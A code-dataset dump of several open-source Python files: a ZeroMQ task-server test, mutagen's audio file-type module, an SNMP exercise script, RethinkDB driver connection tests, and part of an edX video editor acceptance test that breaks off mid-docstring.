code (stringlengths 2-1.05M) | repo_name (stringlengths 5-104) | path (stringlengths 4-251) | language (stringclasses 1) | license (stringclasses 15) | size (int32, 2-1.05M)
---|---|---|---|---|---
#!/usr/bin/python
import zmq
import sys, os
def main():
context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect(os.environ["QP_RUN_ADDRESS"])
def send(msg,expected):
print "Send : ", msg
socket.send(msg)
reply = socket.recv()
print "Reply : ", ':'+reply+':'
if (reply != expected):
print "Expected: ", ':'+expected+':'
print ""
assert (reply == expected)
send("new_job ao_integrals tcp://130.120.229.139:12345 inproc://ao_integrals",
"ok")
send("new_job ao_integrals tcp://130.120.229.139:12345 inproc://ao_integrals",
"error A job is already running")
# send("connect","error Message not understood : connect")
send("connect tcp","connect_reply ao_integrals 1 tcp://130.120.229.139:12345")
send("connect inproc","connect_reply ao_integrals 2 inproc://ao_integrals")
send("disconnect ao_integrals 3","error Queuing_system.ml:68:2 : disconnect ao_integrals 3")
send("disconnect ao_integrals 2","disconnect_reply ao_integrals")
send("connect inproc","connect_reply ao_integrals 3 inproc://ao_integrals")
send("add_task ao_integrals triangle 3", "ok")
send("add_task ao_integrals range 4 7", "ok")
for i in range(8,11):
send("add_task ao_integrals %d %d"%(i,i+10), "ok")
send("get_task ao_integrals 3", "get_task_reply 10 10 20")
send("get_task ao_integrals 3", "get_task_reply 9 9 19")
send("get_task ao_integrals 3", "get_task_reply 8 8 18")
send("task_done ao_integrals 3 10", "ok")
send("task_done ao_integrals 3 9", "ok")
send("task_done ao_integrals 3 8", "ok")
send("del_task ao_integrals 10", "del_task_reply more 10")
send("del_task ao_integrals 9", "del_task_reply more 9")
send("del_task ao_integrals 8", "del_task_reply more 8")
send("del_task ao_integrals 10", "error Task 10 is already deleted : del_task ao_integrals 10")
send("get_task ao_integrals 1", "get_task_reply 7 4")
send("get_task ao_integrals 3", "get_task_reply 6 5")
send("get_task ao_integrals 1", "get_task_reply 5 6")
send("get_task ao_integrals 3", "get_task_reply 4 7")
send("get_task ao_integrals 3", "get_task_reply 3 1 3")
send("get_task ao_integrals 1", "get_task_reply 2 2 3")
send("get_task ao_integrals 1", "get_task_reply 1 3 3")
send("task_done ao_integrals 1 1", "ok")
send("task_done ao_integrals 1 2", "ok")
send("task_done ao_integrals 3 3", "ok")
send("task_done ao_integrals 3 4", "ok")
send("task_done ao_integrals 1 5", "ok")
send("task_done ao_integrals 1 6", "error Queuing_system.ml:81:30 : task_done ao_integrals 1 6")
send("task_done ao_integrals 3 6", "ok")
send("task_done ao_integrals 1 7", "ok")
send("del_task ao_integrals 1", "del_task_reply more 1")
send("del_task ao_integrals 2", "del_task_reply more 2")
send("del_task ao_integrals 3", "del_task_reply more 3")
send("del_task ao_integrals 4", "del_task_reply more 4")
send("del_task ao_integrals 5", "del_task_reply more 5")
send("del_task ao_integrals 6", "del_task_reply more 6")
send("del_task ao_integrals 7", "del_task_reply done 7")
send("end_job ao_integrals","ok")
send("end_job ao_integrals","error No job is running")
send("terminate","ok")
if __name__ == '__main__':
main()
| TApplencourt/quantum_package | ocaml/tests/test_task_server.py | Python | gpl-3.0 | 3,246 |
# Copyright (C) 2005 Michael Urman
# -*- coding: utf-8 -*-
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of version 2 of the GNU General Public License as
# published by the Free Software Foundation.
import warnings
from mutagen._util import DictMixin
from mutagen._compat import izip
class FileType(DictMixin):
"""An abstract object wrapping tags and audio stream information.
Attributes:
* info -- :class:`StreamInfo` -- (length, bitrate, sample rate)
* tags -- :class:`Tags` -- metadata tags, if any
Each file format has different potential tags and stream
information.
FileTypes implement an interface very similar to Metadata; the
dict interface, save, load, and delete calls on a FileType call
the appropriate methods on its tag data.
"""
__module__ = "mutagen"
info = None
tags = None
filename = None
_mimes = ["application/octet-stream"]
def __init__(self, filename=None, *args, **kwargs):
if filename is None:
warnings.warn("FileType constructor requires a filename",
DeprecationWarning)
else:
self.load(filename, *args, **kwargs)
def load(self, filename, *args, **kwargs):
raise NotImplementedError
def __getitem__(self, key):
"""Look up a metadata tag key.
If the file has no tags at all, a KeyError is raised.
"""
if self.tags is None:
raise KeyError(key)
else:
return self.tags[key]
def __setitem__(self, key, value):
"""Set a metadata tag.
If the file has no tags, an appropriate format is added (but
not written until save is called).
"""
if self.tags is None:
self.add_tags()
self.tags[key] = value
def __delitem__(self, key):
"""Delete a metadata tag key.
If the file has no tags at all, a KeyError is raised.
"""
if self.tags is None:
raise KeyError(key)
else:
del(self.tags[key])
def keys(self):
"""Return a list of keys in the metadata tag.
If the file has no tags at all, an empty list is returned.
"""
if self.tags is None:
return []
else:
return self.tags.keys()
def delete(self, filename=None):
"""Remove tags from a file.
In cases where the tagging format is independent of the file type
(for example `mutagen.ID3`) all traces of the tagging format will
be removed.
In cases where the tag is part of the file type, all tags and
padding will be removed.
The tags attribute will be cleared as well if there is one.
Does nothing if the file has no tags.
:raises mutagen.MutagenError: if deleting wasn't possible
"""
if self.tags is not None:
if filename is None:
filename = self.filename
else:
warnings.warn(
"delete(filename=...) is deprecated, reload the file",
DeprecationWarning)
return self.tags.delete(filename)
def save(self, filename=None, **kwargs):
"""Save metadata tags.
:raises mutagen.MutagenError: if saving wasn't possible
"""
if filename is None:
filename = self.filename
else:
warnings.warn(
"save(filename=...) is deprecated, reload the file",
DeprecationWarning)
if self.tags is not None:
return self.tags.save(filename, **kwargs)
def pprint(self):
"""Print stream information and comment key=value pairs."""
stream = "%s (%s)" % (self.info.pprint(), self.mime[0])
try:
tags = self.tags.pprint()
except AttributeError:
return stream
else:
return stream + ((tags and "\n" + tags) or "")
def add_tags(self):
"""Adds new tags to the file.
:raises mutagen.MutagenError: if tags already exist or adding is not
possible.
"""
raise NotImplementedError
@property
def mime(self):
"""A list of mime types"""
mimes = []
for Kind in type(self).__mro__:
for mime in getattr(Kind, '_mimes', []):
if mime not in mimes:
mimes.append(mime)
return mimes
@staticmethod
def score(filename, fileobj, header):
raise NotImplementedError
class StreamInfo(object):
"""Abstract stream information object.
Provides attributes for length, bitrate, sample rate etc.
See the implementations for details.
"""
__module__ = "mutagen"
def pprint(self):
"""Print stream information"""
raise NotImplementedError
def File(filename, options=None, easy=False):
"""Guess the type of the file and try to open it.
The file type is decided by several things, such as the first 128
bytes (which usually contains a file type identifier), the
filename extension, and the presence of existing tags.
If no appropriate type could be found, None is returned.
:param options: Sequence of :class:`FileType` implementations, defaults to
all included ones.
:param easy: Whether the easy wrappers should be returned if available.
For example :class:`EasyMP3 <mp3.EasyMP3>` instead
of :class:`MP3 <mp3.MP3>`.
"""
if options is None:
from mutagen.asf import ASF
from mutagen.apev2 import APEv2File
from mutagen.flac import FLAC
if easy:
from mutagen.easyid3 import EasyID3FileType as ID3FileType
else:
from mutagen.id3 import ID3FileType
if easy:
from mutagen.mp3 import EasyMP3 as MP3
else:
from mutagen.mp3 import MP3
from mutagen.oggflac import OggFLAC
from mutagen.oggspeex import OggSpeex
from mutagen.oggtheora import OggTheora
from mutagen.oggvorbis import OggVorbis
from mutagen.oggopus import OggOpus
if easy:
from mutagen.trueaudio import EasyTrueAudio as TrueAudio
else:
from mutagen.trueaudio import TrueAudio
from mutagen.wavpack import WavPack
if easy:
from mutagen.easymp4 import EasyMP4 as MP4
else:
from mutagen.mp4 import MP4
from mutagen.musepack import Musepack
from mutagen.monkeysaudio import MonkeysAudio
from mutagen.optimfrog import OptimFROG
from mutagen.aiff import AIFF
from mutagen.aac import AAC
from mutagen.smf import SMF
options = [MP3, TrueAudio, OggTheora, OggSpeex, OggVorbis, OggFLAC,
FLAC, AIFF, APEv2File, MP4, ID3FileType, WavPack,
Musepack, MonkeysAudio, OptimFROG, ASF, OggOpus, AAC,
SMF]
if not options:
return None
with open(filename, "rb") as fileobj:
header = fileobj.read(128)
# Sort by name after score. Otherwise import order affects
# Kind sort order, which affects treatment of things with
# equals scores.
results = [(Kind.score(filename, fileobj, header), Kind.__name__)
for Kind in options]
results = list(izip(results, options))
results.sort()
(score, name), Kind = results[-1]
if score > 0:
return Kind(filename)
else:
return None
| bbsan2k/nzbToMedia | libs/mutagen/_file.py | Python | gpl-3.0 | 7,621 |
#!/usr/bin/env python
'''
Applied Python Course, Class1, Exercise 2c
Note, you will need to update the IP and COMMUNITY_STRING to use this script.
'''
import snmp_helper
COMMUNITY_STRING = '********'
ip_addr = '10.10.10.10'
pynet_rtr1 = (ip_addr, COMMUNITY_STRING, 7961)
pynet_rtr2 = (ip_addr, COMMUNITY_STRING, 8061)
SYS_DESCR = '1.3.6.1.2.1.1.1.0'
SYS_NAME = '1.3.6.1.2.1.1.5.0'
for a_device in (pynet_rtr1, pynet_rtr2):
print "\n*********************"
for the_oid in (SYS_NAME, SYS_DESCR):
snmp_data = snmp_helper.snmp_get_oid(a_device, oid=the_oid)
output = snmp_helper.snmp_extract(snmp_data)
print output
print "*********************"
print
| Collisio-Adolebitque/pfne-2017 | pynet/appliedpy_ecourse/class1/ex2_simple_snmp.py | Python | gpl-3.0 | 694 |
#!/usr/bin/env python
##
# Tests the driver API for making connections and exercises the networking code
###
from __future__ import print_function
import datetime, os, random, re, socket, sys, tempfile, threading, time, traceback, unittest
sys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir, "common"))
import driver, utils
try:
xrange
except NameError:
xrange = range
try:
import SocketServer
except:
import socketserver as SocketServer
# -- import the rethinkdb driver
r = utils.import_python_driver()
# -- get settings
DEFAULT_DRIVER_PORT = 28015
rethinkdb_exe = sys.argv[1] if len(sys.argv) > 1 else utils.find_rethinkdb_executable()
use_default_port = bool(int(sys.argv[2])) if len(sys.argv) > 2 else 0
# -- shared server
sharedServer = None
sharedServerOutput = None
sharedServerHost = None
sharedServerDriverPort = None
if 'RDB_DRIVER_PORT' in os.environ:
sharedServerDriverPort = int(os.environ['RDB_DRIVER_PORT'])
if 'RDB_SERVER_HOST' in os.environ:
sharedServerHost = os.environ['RDB_SERVER_HOST']
else:
sharedServerHost = 'localhost'
def checkSharedServer():
if sharedServerDriverPort is not None:
conn = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
if 'test' not in r.db_list().run(conn):
r.db_create('test').run(conn)
def closeSharedServer():
global sharedServer, sharedServerOutput, sharedServerHost, sharedServerDriverPort
if sharedServer is not None:
try:
sharedServer.close()
except Exception as e:
sys.stderr.write('Got error while shutting down server: %s' % str(e))
sharedServer = None
sharedServerOutput = None
sharedServerHost = None
sharedServerDriverPort = None
# == Test Base Classes
class TestCaseCompatible(unittest.TestCase):
'''Compatibility shim for Python 2.6'''
def __init__(self, *args, **kwargs):
super(TestCaseCompatible, self).__init__(*args, **kwargs)
if not hasattr(self, 'assertRaisesRegexp'):
self.assertRaisesRegexp = self.replacement_assertRaisesRegexp
if not hasattr(self, 'skipTest'):
self.skipTest = self.replacement_skipTest
if not hasattr(self, 'assertGreaterEqual'):
self.assertGreaterEqual = self.replacement_assertGreaterEqual
if not hasattr(self, 'assertLess'):
self.assertLess = self.replacement_assertLess
def replacement_assertGreaterEqual(self, greater, lesser):
if not greater >= lesser:
raise AssertionError('%s not greater than or equal to %s' % (greater, lesser))
def replacement_assertLess(self, lesser, greater):
if not greater > lesser:
raise AssertionError('%s not less than %s' % (lesser, greater))
def replacement_skipTest(self, message):
sys.stderr.write("%s " % message)
def replacement_assertRaisesRegexp(self, exception, regexp, callable_func, *args, **kwds):
try:
callable_func(*args, **kwds)
except Exception as e:
self.assertTrue(isinstance(e, exception), '%s expected to raise %s but instead raised %s: %s\n%s' % (repr(callable_func), repr(exception), e.__class__.__name__, str(e), traceback.format_exc()))
self.assertTrue(re.search(regexp, str(e)), '%s did not raise the expected message "%s", but rather: %s' % (repr(callable_func), str(regexp), str(e)))
else:
self.fail('%s failed to raise a %s' % (repr(callable_func), repr(exception)))
class TestWithConnection(TestCaseCompatible):
port = None
server = None
serverOutput = None
def setUp(self):
global sharedServer, sharedServerOutput, sharedServerHost, sharedServerDriverPort
if sharedServer is not None:
try:
sharedServer.check()
except Exception:
# ToDo: figure out how to blame the last test
closeSharedServer()
if sharedServerDriverPort is None:
sharedServerOutput = tempfile.NamedTemporaryFile('w+')
sharedServer = driver.Process(executable_path=rethinkdb_exe, console_output=sharedServerOutput, wait_until_ready=True)
sharedServerHost = sharedServer.host
sharedServerDriverPort = sharedServer.driver_port
# - ensure we are ready
checkSharedServer()
def tearDown(self):
global sharedServer, sharedServerOutput, sharedServerHost, sharedServerDriverPort
if sharedServerDriverPort is not None:
try:
checkSharedServer()
except Exception:
closeSharedServer()
raise # ToDo: figure out how to best give the server log
# == Test Classes
class TestNoConnection(TestCaseCompatible):
# No servers started yet so this should fail
def test_connect(self):
if not use_default_port:
self.skipTest("Not testing default port")
return # in case we fell back on replacement_skip
self.assertRaisesRegexp(r.RqlDriverError, "Could not connect to localhost:%d." % DEFAULT_DRIVER_PORT, r.connect)
def test_connect_port(self):
port = utils.get_avalible_port()
self.assertRaisesRegexp(r.RqlDriverError, "Could not connect to localhost:%d." % port, r.connect, port=port)
def test_connect_host(self):
if not use_default_port:
self.skipTest("Not testing default port")
return # in case we fell back on replacement_skip
self.assertRaisesRegexp(
r.RqlDriverError, "Could not connect to 0.0.0.0:%d." % DEFAULT_DRIVER_PORT, r.connect, host="0.0.0.0")
def test_connect_timeout(self):
'''Test that we get a ReQL error if we connect to a non-responsive port'''
useSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
useSocket.bind(('localhost', 0))
useSocket.listen(0)
host, port = useSocket.getsockname()
try:
self.assertRaisesRegexp(r.RqlDriverError,
"Could not connect to %s:%d. Error: Operation timed out." % (host, port),
r.connect, host=host, port=port, timeout=2)
finally:
useSocket.close()
def test_connect_host(self):
port = utils.get_avalible_port()
self.assertRaisesRegexp(r.RqlDriverError, "Could not connect to 0.0.0.0:%d." % port, r.connect, host="0.0.0.0", port=port)
def test_empty_run(self):
# Test the error message when we pass nothing to run and didn't call `repl`
self.assertRaisesRegexp(r.RqlDriverError, "RqlQuery.run must be given a connection to run on.", r.expr(1).run)
def test_auth_key(self):
# Test that everything still doesn't work even with an auth key
if not use_default_port:
self.skipTest("Not testing default port")
return # in case we fell back on replacement_skip
self.assertRaisesRegexp(r.RqlDriverError, 'Could not connect to 0.0.0.0:%d."' % DEFAULT_DRIVER_PORT, r.connect, host="0.0.0.0", port=DEFAULT_DRIVER_PORT, auth_key="hunter2")
class TestPrivateServer(TestCaseCompatible):
server = None
serverConsoleOutput = None
useDefaultPort = False
port = None
authKey = None
@classmethod
def setUp(cls):
if cls.server is not None:
try:
cls.server.check()
except Exception:
cls.server = None
if cls.server is None:
port = str(DEFAULT_DRIVER_PORT) if cls.useDefaultPort else '0'
cls.serverConsoleOutput = tempfile.NamedTemporaryFile('w+')
cls.server = driver.Process(executable_path=rethinkdb_exe, console_output=cls.serverConsoleOutput, wait_until_ready=True, extra_options=['--driver-port', port])
cls.port = cls.server.driver_port
if cls.authKey is not None:
conn = r.connect(host=cls.server.host, port=cls.server.driver_port)
result = r.db('rethinkdb').table('cluster_config').update({'auth_key':cls.authKey}).run(conn)
if result != {'skipped': 0, 'deleted': 0, 'unchanged': 0, 'errors': 0, 'replaced': 1, 'inserted': 0}:
raise Exception('Unable to set authkey, got: %s' % str(result))
@classmethod
def tearDown(cls):
if cls.server is not None:
try:
cls.server.check()
except Exception as e:
try:
cls.server.close()
except Exception:
pass
cls.server = None
raise
class TestConnectionDefaultPort(TestPrivateServer):
useDefaultPort = True
def setUp(self):
if not use_default_port:
self.skipTest("Not testing default port")
return # in case we fell back on replacement_skip
super(TestConnectionDefaultPort, self).setUp()
def test_connect(self):
if not use_default_port:
return
conn = r.connect()
conn.reconnect()
def test_connect_host(self):
if not use_default_port:
return
conn = r.connect(host='localhost')
conn.reconnect()
def test_connect_host_port(self):
if not use_default_port:
return
conn = r.connect(host='localhost', port=DEFAULT_DRIVER_PORT)
conn.reconnect()
def test_connect_port(self):
if not use_default_port:
return
conn = r.connect(port=DEFAULT_DRIVER_PORT)
conn.reconnect()
def test_connect_wrong_auth(self):
if not use_default_port:
return
self.assertRaisesRegexp(
r.RqlDriverError, "Server dropped connection with message: \"ERROR: Incorrect authorization key.\"",
r.connect, auth_key="hunter2")
class TestAuthConnection(TestPrivateServer):
incorrectAuthMessage = 'Server dropped connection with message: "ERROR: Incorrect authorization key."'
authKey = 'hunter2'
def test_connect_no_auth(self):
self.assertRaisesRegexp(r.RqlDriverError, self.incorrectAuthMessage, r.connect, port=self.port)
def test_connect_wrong_auth(self):
self.assertRaisesRegexp(r.RqlDriverError, self.incorrectAuthMessage, r.connect, port=self.port, auth_key="")
self.assertRaisesRegexp(r.RqlDriverError, self.incorrectAuthMessage, r.connect, port=self.port, auth_key="hunter3")
self.assertRaisesRegexp(r.RqlDriverError, self.incorrectAuthMessage, r.connect, port=self.port, auth_key="hunter22")
def test_connect_long_auth(self):
long_key = str("k") * 2049
not_long_key = str("k") * 2048
self.assertRaisesRegexp(
r.RqlDriverError, "Server dropped connection with message: \"ERROR: Client provided an authorization key that is too long.\"",
r.connect, port=self.port, auth_key=long_key)
self.assertRaisesRegexp(r.RqlDriverError, self.incorrectAuthMessage, r.connect, port=self.port, auth_key=not_long_key)
def test_connect_correct_auth(self):
conn = r.connect(port=self.port, auth_key="hunter2")
conn.reconnect()
class TestConnection(TestWithConnection):
def test_connect_close_reconnect(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
r.expr(1).run(c)
c.close()
c.close()
c.reconnect()
r.expr(1).run(c)
def test_connect_close_expr(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
r.expr(1).run(c)
c.close()
self.assertRaisesRegexp(
r.RqlDriverError, "Connection is closed.",
r.expr(1).run, c)
def test_noreply_wait_waits(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
t = time.time()
r.js('while(true);', timeout=0.5).run(c, noreply=True)
c.noreply_wait()
duration = time.time() - t
self.assertGreaterEqual(duration, 0.5)
def test_close_waits_by_default(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
t = time.time()
r.js('while(true);', timeout=0.5).run(c, noreply=True)
c.close()
duration = time.time() - t
self.assertGreaterEqual(duration, 0.5)
def test_reconnect_waits_by_default(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
t = time.time()
r.js('while(true);', timeout=0.5).run(c, noreply=True)
c.reconnect()
duration = time.time() - t
self.assertGreaterEqual(duration, 0.5)
def test_close_does_not_wait_if_requested(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
t = time.time()
r.js('while(true);', timeout=0.5).run(c, noreply=True)
c.close(noreply_wait=False)
duration = time.time() - t
self.assertLess(duration, 0.5)
def test_reconnect_does_not_wait_if_requested(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
t = time.time()
r.js('while(true);', timeout=0.5).run(c, noreply=True)
c.reconnect(noreply_wait=False)
duration = time.time() - t
self.assertLess(duration, 0.5)
def test_db(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
if 't1' in r.db('test').table_list().run(c):
r.db('test').table_drop('t1').run(c)
r.db('test').table_create('t1').run(c)
if 'db2' in r.db_list().run(c):
r.db_drop('db2').run(c)
r.db_create('db2').run(c)
if 't2' in r.db('db2').table_list().run(c):
r.db('db2').table_drop('t2').run(c)
r.db('db2').table_create('t2').run(c)
# Default db should be 'test' so this will work
r.table('t1').run(c)
# Use a new database
c.use('db2')
r.table('t2').run(c)
self.assertRaisesRegexp(r.RqlRuntimeError, "Table `db2.t1` does not exist.", r.table('t1').run, c)
c.use('test')
r.table('t1').run(c)
self.assertRaisesRegexp( r.RqlRuntimeError, "Table `test.t2` does not exist.", r.table('t2').run, c)
c.close()
# Test setting the db in connect
c = r.connect(db='db2', host=sharedServerHost, port=sharedServerDriverPort)
r.table('t2').run(c)
self.assertRaisesRegexp(r.RqlRuntimeError, "Table `db2.t1` does not exist.", r.table('t1').run, c)
c.close()
# Test setting the db as a `run` option
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
r.table('t2').run(c, db='db2')
def test_use_outdated(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
if 't1' in r.db('test').table_list().run(c):
r.db('test').table_drop('t1').run(c)
r.db('test').table_create('t1').run(c)
# Use outdated is an option that can be passed to db.table or `run`
# We're just testing here if the server actually accepts the option.
r.table('t1', use_outdated=True).run(c)
r.table('t1').run(c, use_outdated=True)
def test_repl(self):
# Calling .repl() should set this connection as global state
# to be used when `run` is not otherwise passed a connection.
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort).repl()
r.expr(1).run()
c.repl() # is idempotent
r.expr(1).run()
c.close()
self.assertRaisesRegexp(r.RqlDriverError, "Connection is closed", r.expr(1).run)
def test_port_conversion(self):
c = r.connect(host=sharedServerHost, port=str(sharedServerDriverPort))
r.expr(1).run(c)
c.close()
self.assertRaisesRegexp(r.RqlDriverError, "Could not convert port abc to an integer.", r.connect, port='abc', host=sharedServerHost)
class TestShutdown(TestWithConnection):
def setUp(self):
if sharedServer is None:
closeSharedServer() # we need to be able to kill the server, so can't use one from outside
super(TestShutdown, self).setUp()
def test_shutdown(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
r.expr(1).run(c)
closeSharedServer()
time.sleep(0.2)
self.assertRaisesRegexp(r.RqlDriverError, "Connection is closed.", r.expr(1).run, c)
# This doesn't really have anything to do with connections but it'll go
# in here for the time being.
class TestPrinting(TestCaseCompatible):
# Just test that RQL queries support __str__ using the pretty printer.
# An exhaustive test of the pretty printer would be, well, exhausting.
def runTest(self):
self.assertEqual(str(r.db('db1').table('tbl1').map(lambda x: x)),
"r.db('db1').table('tbl1').map(lambda var_1: var_1)")
# Another non-connection connection test. It's to test that get_intersecting()
# batching works properly.
class TestGetIntersectingBatching(TestWithConnection):
def runTest(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
if 't1' in r.db('test').table_list().run(c):
r.db('test').table_drop('t1').run(c)
r.db('test').table_create('t1').run(c)
t1 = r.db('test').table('t1')
t1.index_create('geo', geo=True).run(c)
t1.index_wait('geo').run(c)
batch_size = 3
point_count = 500
poly_count = 500
get_tries = 10
# Insert a couple of random points, so we get a well distributed range of
# secondary keys. Also insert a couple of large-ish polygons, so we can
# test filtering of duplicates on the server.
rseed = random.getrandbits(64)
random.seed(rseed)
print("Random seed: " + str(rseed), end=' ')
sys.stdout.flush()
points = []
for i in xrange(0, point_count):
points.append({'geo':r.point(random.uniform(-180.0, 180.0), random.uniform(-90.0, 90.0))})
polygons = []
for i in xrange(0, poly_count):
# A fairly big circle, so it will cover a large range in the secondary index
polygons.append({'geo':r.circle([random.uniform(-180.0, 180.0), random.uniform(-90.0, 90.0)], 1000000)})
t1.insert(points).run(c)
t1.insert(polygons).run(c)
# Check that the results are actually lazy at least some of the time
# While the test is randomized, chances are extremely high to get a lazy result at least once.
seen_lazy = False
for i in xrange(0, get_tries):
query_circle = r.circle([random.uniform(-180.0, 180.0), random.uniform(-90.0, 90.0)], 8000000);
reference = t1.filter(r.row['geo'].intersects(query_circle)).coerce_to("ARRAY").run(c)
cursor = t1.get_intersecting(query_circle, index='geo').run(c, max_batch_rows=batch_size)
if cursor.error is None:
seen_lazy = True
itr = iter(cursor)
while len(reference) > 0:
row = next(itr)
self.assertEqual(reference.count(row), 1)
reference.remove(row)
self.assertRaises(r.RqlCursorEmpty, lambda: next(itr))
self.assertTrue(seen_lazy)
r.db('test').table_drop('t1').run(c)
class TestBatching(TestWithConnection):
def runTest(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
# Test the cursor API when there is exactly mod batch size elements in the result stream
if 't1' in r.db('test').table_list().run(c):
r.db('test').table_drop('t1').run(c)
r.db('test').table_create('t1').run(c)
t1 = r.table('t1')
batch_size = 3
count = 500
ids = set(xrange(0, count))
t1.insert([{'id':i} for i in ids]).run(c)
cursor = t1.run(c, max_batch_rows=batch_size)
itr = iter(cursor)
for i in xrange(0, count - 1):
row = next(itr)
ids.remove(row['id'])
self.assertEqual(next(itr)['id'], ids.pop())
self.assertRaises(r.RqlCursorEmpty, lambda: next(itr))
r.db('test').table_drop('t1').run(c)
class TestGroupWithTimeKey(TestWithConnection):
def runTest(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
if 'times' in r.db('test').table_list().run(c):
r.db('test').table_drop('times').run(c)
r.db('test').table_create('times').run(c)
time1 = 1375115782.24
rt1 = r.epoch_time(time1).in_timezone('+00:00')
dt1 = datetime.datetime.fromtimestamp(time1, r.ast.RqlTzinfo('+00:00'))
time2 = 1375147296.68
rt2 = r.epoch_time(time2).in_timezone('+00:00')
dt2 = datetime.datetime.fromtimestamp(time2, r.ast.RqlTzinfo('+00:00'))
res = r.table('times').insert({'id':0, 'time':rt1}).run(c)
self.assertEqual(res['inserted'], 1)
res = r.table('times').insert({'id':1, 'time':rt2}).run(c)
self.assertEqual(res['inserted'], 1)
expected_row1 = {'id':0, 'time':dt1}
expected_row2 = {'id':1, 'time':dt2}
groups = r.table('times').group('time').coerce_to('array').run(c)
self.assertEqual(groups, {dt1:[expected_row1], dt2:[expected_row2]})
class TestSuccessAtomFeed(TestWithConnection):
def runTest(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
from rethinkdb import ql2_pb2 as p
if 'success_atom_feed' in r.db('test').table_list().run(c):
r.db('test').table_drop('success_atom_feed').run(c)
r.db('test').table_create('success_atom_feed').run(c)
t1 = r.db('test').table('success_atom_feed')
res = t1.insert({'id': 0, 'a': 16}).run(c)
self.assertEqual(res['inserted'], 1)
res = t1.insert({'id': 1, 'a': 31}).run(c)
self.assertEqual(res['inserted'], 1)
t1.index_create('a', lambda x: x['a']).run(c)
t1.index_wait('a').run(c)
changes = t1.get(0).changes().run(c)
self.assertTrue(changes.error is None)
self.assertEqual(len(changes.items), 1)
if __name__ == '__main__':
print("Running py connection tests")
suite = unittest.TestSuite()
loader = unittest.TestLoader()
suite.addTest(loader.loadTestsFromTestCase(TestNoConnection))
if use_default_port:
suite.addTest(loader.loadTestsFromTestCase(TestConnectionDefaultPort))
suite.addTest(loader.loadTestsFromTestCase(TestAuthConnection))
suite.addTest(loader.loadTestsFromTestCase(TestConnection))
suite.addTest(TestPrinting())
suite.addTest(TestBatching())
suite.addTest(TestGetIntersectingBatching())
suite.addTest(TestGroupWithTimeKey())
suite.addTest(TestSuccessAtomFeed())
suite.addTest(loader.loadTestsFromTestCase(TestShutdown))
res = unittest.TextTestRunner(verbosity=2).run(suite)
serverClosedCleanly = True
try:
if sharedServer is not None:
sharedServer.check_and_stop()
except Exception as e:
serverClosedCleanly = False
sys.stderr.write('The server did not close cleanly after testing: %s' % str(e))
if not res.wasSuccessful() or not serverClosedCleanly:
sys.exit(1)
| urandu/rethinkdb | test/rql_test/connections/connection.py | Python | agpl-3.0 | 23,434 |
# -*- coding: utf-8 -*-
"""
Acceptance tests for CMS Video Editor.
"""
import ddt
from common.test.acceptance.pages.common.utils import confirm_prompt
from common.test.acceptance.tests.video.test_studio_video_module import CMSVideoBaseTest
@ddt.ddt
class VideoEditorTest(CMSVideoBaseTest):
"""
CMS Video Editor Test Class
"""
shard = 6
def _create_video_component(self, subtitles=False):
"""
Create a video component and navigate to unit page
Arguments:
subtitles (bool): Upload subtitles or not
"""
if subtitles:
self.assets.append('subs_3_yD_cEKoCk.srt.sjson')
self.navigate_to_course_unit()
def test_default_settings(self):
"""
Scenario: User can view Video metadata
Given I have created a Video component
And I edit the component
Then I see the correct video settings and default values
"""
self._create_video_component()
self.edit_component()
self.assertTrue(self.video.verify_settings())
def test_modify_video_display_name(self):
"""
Scenario: User can modify Video display name
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
Then I can modify video display name
And my video display name change is persisted on save
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.set_field_value('Component Display Name', 'Transformers')
self.save_unit_settings()
self.edit_component()
self.open_advanced_tab()
self.assertTrue(self.video.verify_field_value('Component Display Name', 'Transformers'))
def test_hidden_captions(self):
"""
Scenario: Captions are hidden when "transcript display" is false
Given I have created a Video component with subtitles
And I have set "transcript display" to False
Then when I view the video it does not show the captions
"""
self._create_video_component(subtitles=True)
# Prevent cookies from overriding course settings
self.browser.delete_cookie('hide_captions')
self.edit_component()
self.open_advanced_tab()
self.video.set_field_value('Show Transcript', 'False', 'select')
self.save_unit_settings()
self.assertFalse(self.video.is_captions_visible())
def test_translations_uploading(self):
"""
Scenario: Translations uploading works correctly
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts.srt" for "zh" language code
And I save changes
Then when I view the video it does show the captions
And I see "好 各位同学" text in the captions
And I edit the component
And I open tab "Advanced"
And I see translations for "zh"
And I upload transcript file "uk_transcripts.srt" for "uk" language code
And I save changes
Then when I view the video it does show the captions
And I see "好 各位同学" text in the captions
And video language menu has "uk, zh" translations
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = u"好 各位同学"
self.assertIn(unicode_text, self.video.captions_text)
self.edit_component()
self.open_advanced_tab()
self.assertEqual(self.video.translations(), ['zh'])
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
self.assertIn(unicode_text, self.video.captions_text)
self.assertEqual(set(self.video.caption_languages.keys()), {'zh', 'uk'})
def test_save_language_upload_no_transcript(self):
"""
Scenario: Transcript language is not shown in language menu if no transcript file is uploaded
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
